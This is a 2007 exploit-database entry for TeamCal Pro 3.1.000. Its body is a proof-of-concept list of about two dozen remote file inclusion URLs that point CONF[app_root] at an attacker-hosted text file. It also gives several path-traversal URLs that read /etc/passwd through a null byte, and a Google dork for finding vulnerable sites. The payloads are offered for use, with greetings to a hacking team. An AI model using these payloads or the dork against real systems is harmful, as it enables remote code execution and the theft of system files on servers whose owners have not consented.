TeamCalPro 3.1.000 - Multiple Local/Remote File Inclusions



EKU-ID: 12738 CVE: OSVDB-39830;CVE-2007-6554;OSVDB-39829;OSVDB-39828;OSVDB-39827;OSVDB-39826;OSVDB-39825;OSVDB-39824;OSVDB-39823;OSVDB-39822;OSVDB-39821;OSVDB-39820;OSVDB-39819;OSVDB-39818;OSVDB-39817;OSVDB-39816;OSVDB-39815;OSVDB-39814;OSVDB-39813;OSVDB-39812;OSVDB-39811;OSVDB-39810;OSVDB-39809;OSVDB-39808;CVE-2007-6553;OSVDB-39807;OSVDB-39806;OSVDB-39805 OSVDB-ID:
Author: GoLd_M Published: 2007-12-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


  ##############             ######  ######                  ########           ########                ######  ######
  ##    ##    ##               ##      ##                  ##      ##          ##      ##                 ####  ####
        ##       ####  ######    ##  ##      ########    ##                  ##             ########      ####  ####
        ##         ####          ##  ##    ##        ##  ##                  ##           ##        ##    ##  ##  ##
        ##         ##              ##        ##########  ##      ######      ##           ##        ##    ##  ##  ##
        ##         ##              ##      ##        ##  ##        ##        ##           ##        ##    ##      ##
        ##         ##              ##      ##        ##    ##      ##   ####   ##      ## ##        ##    ##      ##
      ######     ##########      ######      ##########      ######     ####     ######     ########    ######  ######



                   TeamCal Pro <= 3.1.000 Multiple RFI / LFI Vulnerabilities
                   Script: http://www.lewe.com/index.php?option=com_docman&task=cat_view&gid=112&Itemid=27
                   POC :
                   http://localhost/ScriptPage/includes/tcuser.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/absencecount.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/avatar.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/csvhandler.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/functions.tcpro.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/header.html.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/joomlajack.tcpro.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/menu.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/other.inc.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcabsence.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcabsencegroup.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcallowance.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcannouncement.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes/tcconfig.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcdaynote.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcgroup.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tclogin.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcmonth.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tctemplate.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcuser.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcusergroup.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage/includes//tcuseroption.class.php?CONF[app_root]=http://localhost/020.txt?
                   http://localhost/ScriptPage//index.php?lang=../../../../../../../../etc/passwd%00
                   http://localhost/ScriptPage//register.php?lang=../../../../../../../../etc/passwd%00
                   http://localhost/ScriptPage/login.php?lang=../../../../../../../../etc/passwd%00
                   http://localhost/ScriptPage/statistics.php?lang=../../../../../../../../etc/passwd%00

                   Dork : http://www.google.com.sa/search?q=Powered+by+TeamCal+Pro&ie=utf-8&oe=utf-8&rls=org.mozilla:ar:official&client=firefox-a
                   SP.Thanx To : Tryag.Com/cc [Tryag-Team]

# milw0rm.com [2007-12-25]